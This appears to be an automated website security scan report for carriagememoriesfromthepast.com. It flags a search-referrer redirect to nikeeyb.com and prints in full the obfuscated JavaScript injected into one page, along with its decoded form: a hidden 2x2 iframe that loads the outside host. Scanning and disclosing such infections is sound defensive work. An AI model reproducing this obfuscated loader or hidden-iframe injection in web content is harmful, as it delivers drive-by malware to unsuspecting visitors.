Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://carriagememoriesfromthepast.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: carriagememoriesfromthepast.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 01 Sep 2014 04:47:23 GMT Location: http://nikeeyb.com/stats.php Server: Apache Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://carriagememoriesfromthepast.com/ | 200 OK Content-Length: 887 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/Embedded%20Windows%20Media%20Player%207%20Control.htm | 200 OK Content-Length: 2730 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,330,420,107,202,303,484,98,92,297,444,109,94,345,464,97,232,345,184,112,208,336,136,32,230,297,456,111,216,324,420,110,206,183,136,97,234,348,444,34,64,306,456,97,218,303,392,111,228,300,404,114,122,102,440,111,68,96,388,108,210,309,440,61,68,297,404,110,232,303,456,34,64,312,404,105,206,312,464,61,68,150,136,32,238,315,400,116,208,183,136,50,68,186,240,47,210,306,456,97,218,303,248,39,82,177,52,10];if(window.document)for(i=6-2-1-2-1;-145+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e("if(1)"+ss);}} Decoded script: if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://carriagememoriesfromthepast.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/arrow.gif | 200 OK Content-Length: 839 Content-Type: image/gif | clean |
http://carriagememoriesfromthepast.com/camera1.gif | 200 OK Content-Length: 3955 Content-Type: image/gif | clean |
http://carriagememoriesfromthepast.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/contactform.swf | 200 OK Content-Length: 51578 Content-Type: application/x-shockwave-flash | clean |
http://carriagememoriesfromthepast.com/index14.swf | 200 OK Content-Length: 300532 Content-Type: application/x-shockwave-flash | clean |
http://carriagememoriesfromthepast.com/logo.gif | 200 OK Content-Length: 12381 Content-Type: image/gif | clean |
http://carriagememoriesfromthepast.com/php.back | 200 OK Content-Length: 22 Content-Type: text/plain | clean |
http://carriagememoriesfromthepast.com/php/ | 200 OK Content-Length: 366 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/php/contactform.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/php/newwebsite.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/php/review.php | 200 OK Content-Length: 2 Content-Type: text/html | clean |
http://carriagememoriesfromthepast.com/picture_library/ | 200 OK Content-Length: 234 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carriagememoriesfromthepast.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://carriagememoriesfromthepast.com/
Result: carriagememoriesfromthepast.com is not infected or malware details are not published yet.
Result: carriagememoriesfromthepast.com is not infected or malware details are not published yet.